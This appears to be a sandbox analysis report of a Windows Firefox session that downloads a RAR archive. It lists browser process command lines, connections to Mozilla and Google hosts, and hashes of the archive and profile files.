"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.2.130677202\1121656305" -childID 1 -isForBrowser -prefsHandle 2956 -prefMapHandle 2952 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e5a64e8-db69-411c-ad5b-16a46a494907} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2968 1a2a204e258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.3.933664428\808760156" -childID 2 -isForBrowser -prefsHandle 3476 -prefMapHandle 3472 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c0687a4-b663-4113-96f9-e03b31fa80c2} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 3480 1a2a4940158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.4.1084011871\465001702" -childID 3 -isForBrowser -prefsHandle 5312 -prefMapHandle 5244 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {852893ed-e72b-49fe-a9ff-09f88bdb9c9c} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5292 1a2a63e5758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.5.388493459\796138205" -childID 4 -isForBrowser -prefsHandle 5664 -prefMapHandle 5612 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b347050-6488-4fa6-8329-0f086cf2b883} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5648 1a2a65f2a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.6.1333653784\580149765" -childID 5 -isForBrowser -prefsHandle 5828 -prefMapHandle 5832 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcd95f32-c73b-4356-9058-6c9a7abc2054} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5816 1a2a65f1e58 tab
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49758 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 44.239.14.124:443 | shavar.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:49764 | tcp | |
| US | 35.244.181.201:443 | prod.balrog.prod.cloudops.mozgcp.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| NL | 2.18.121.73:80 | a19.dscg10.akamai.net | tcp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| FR | 173.194.190.134:443 | r1.sn-25glene6.gvt1.com | tcp |
| FR | 173.194.190.134:443 | r1.sn-25glene6.gvt1.com | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 52.111.227.13:443 | tcp |
Files
C:\Users\Admin\Downloads\dBhAKJfb.rar.part
| MD5 | 58499bbb694ff3a09362d57e35c660c7 |
| SHA1 | 8fb1d6c6ff24b9710e78fddce0a3ed20201ccf96 |
| SHA256 | eb6f8f2a7f814d765640c5e6422921576383c85183677c8c1328f846bda5906e |
| SHA512 | bb60444d0c0e91759bc6737a79d1cdb1e678b853fefc0e254a30d3455dcbd4c929847272e2a8f8ef779b6991f1aed44691a10a772c9920dca2a2298fb9a22b89 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 14844b622c27f6ed9d3effef650f3a31 |
| SHA1 | 2fe8994329753314a03ea4e19c8782d13b51b215 |
| SHA256 | b0cbbe64db7158bec3fc35d155085474d4b65a9b4ca9cfaa461f265a814cd444 |
| SHA512 | 1e5d2e0f067f26f3482b63914d511cbb6477b0d02a71d23487f49e30ab90cf0d5d7e4dfe8da0aeb1b0da077e891cbf858b396240fd453a0edaa9067808570b8f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs.js
| MD5 | cdcedf49d4f5e13d1adb4861c1d7777d |
| SHA1 | e57b0e31d90797d6bd1ef9307423b4e9a505e3fa |
| SHA256 | 42145d0797049673b1016b5900d6c31dc77f86e66f8ad80a17f8b4e0c0e2157d |
| SHA512 | 1f397ca6a782c9adb9a5053f06fcd7d1cff895fdee567457061f8e164bbe11edbb55ec6a637eed7aac58c8b922a7e78e5b2f297bf19218f5cb7b3099ed8f1292 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | b23ee5c0d7126400fae02c8d9a469445 |
| SHA1 | 32bda03eb8732187fe015bcc23f450000811ddd5 |
| SHA256 | b85e7bcce38290a2b3731ff30159a0cfaf20a9bc142f16f5feaa662448eb40a8 |
| SHA512 | 194ebf1718f47b25aecbcacce4828c407e4b151dcfd874fa2b4647138596a763b40a839d39a65a514be5a7bca1a96957a845b82a36890721b093f720755b9c93 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js
| MD5 | ee876473f47bd65e0ced26246d4061f7 |
| SHA1 | 7924503dcaa71cc1784ce250be242441fccfc5f5 |
| SHA256 | cff30058f2abeae0e9a2f389cf1492dcb5514397a14bd2190ed608d3c1266e22 |
| SHA512 | 4ad97644305f44b30a86a7e7cbda18ff602f751634d1024fc10886de240b1742244fa3ec0783dc1dee4f079ba222e7908104902e429b30ec9c091497a2c31973 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\cache2\entries\C72D4296C2EBC6FD41A9F780CD0C8F30F0FF937C
| MD5 | 008aade41e63a8f062f6eb865d814885 |
| SHA1 | 03d4f22f917a40317da836c83ecf40238aee95ec |
| SHA256 | 5bcb6c303e58acc445986a612bfbc5f8669643a7eddfda16f8dcb2b993026390 |
| SHA512 | 4bf160e725b1eefee98e74d4bafe7ebea5114e87b6a640f10ae759434b5e9e31e2c62a790028bda713127b0c962d3e66c0725acacd040d8631cf3670aefd079e |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js
| MD5 | 15bc14f22eebe8c0c8b317da8984a560 |
| SHA1 | 465e77d3e2738381294a9cd1f8a9c5b567e80b2d |
| SHA256 | 35138588a19acf7f1cea1bb0c3950f6ac012f5ee55bd9eff884ce94957129e66 |
| SHA512 | 70b0d1639877f0a56091a9b6817663d60bcd9dadd8d0a01e96de767f98ecbe2c3a9746c44b5d49b4bd139f0cc9849b10f11de2755b997122087cb98a1eaafbe8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionstore.jsonlz4
| MD5 | 7314ed476fbb34fb1db3ada9c9ac2228 |
| SHA1 | 626fe3801405a29ccd18e3a85c943326f980c4ac |
| SHA256 | 2abd6f5f874df960dbb425fe560de8f99c24f91903c037826e328b345a3f76a9 |
| SHA512 | 16b2a81e8b40f036cd2781d0bada8ccbe83864b201742212733a0ba77fbbb92f8b04fba77a4d5139d14acbfd82f4e326662e6fd7ffff104d0c3e86511bc4ced1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionCheckpoints.json
| MD5 | 948a7403e323297c6bb8a5c791b42866 |
| SHA1 | 88a555717e8a4a33eccfb7d47a2a4aa31038f9c0 |
| SHA256 | 2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e |
| SHA512 | 17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js
| MD5 | 39c885779435b5b88321b795b03c63ca |
| SHA1 | 415914193f7fba61d68de2a4ead904e8a5568bc8 |
| SHA256 | 01258c713ab3a9e7aca318805fd3d4dbd6bc1c32c0480f1f5959408857c679d3 |
| SHA512 | 725a24e1f52f50bb2003eb2a311d790985c8a29a62ffce37637a855695f6131fce8bd71b122a8b7addb1dbdaea154f6751feb41dd1f92f2feac3caf6fb10d1e8 |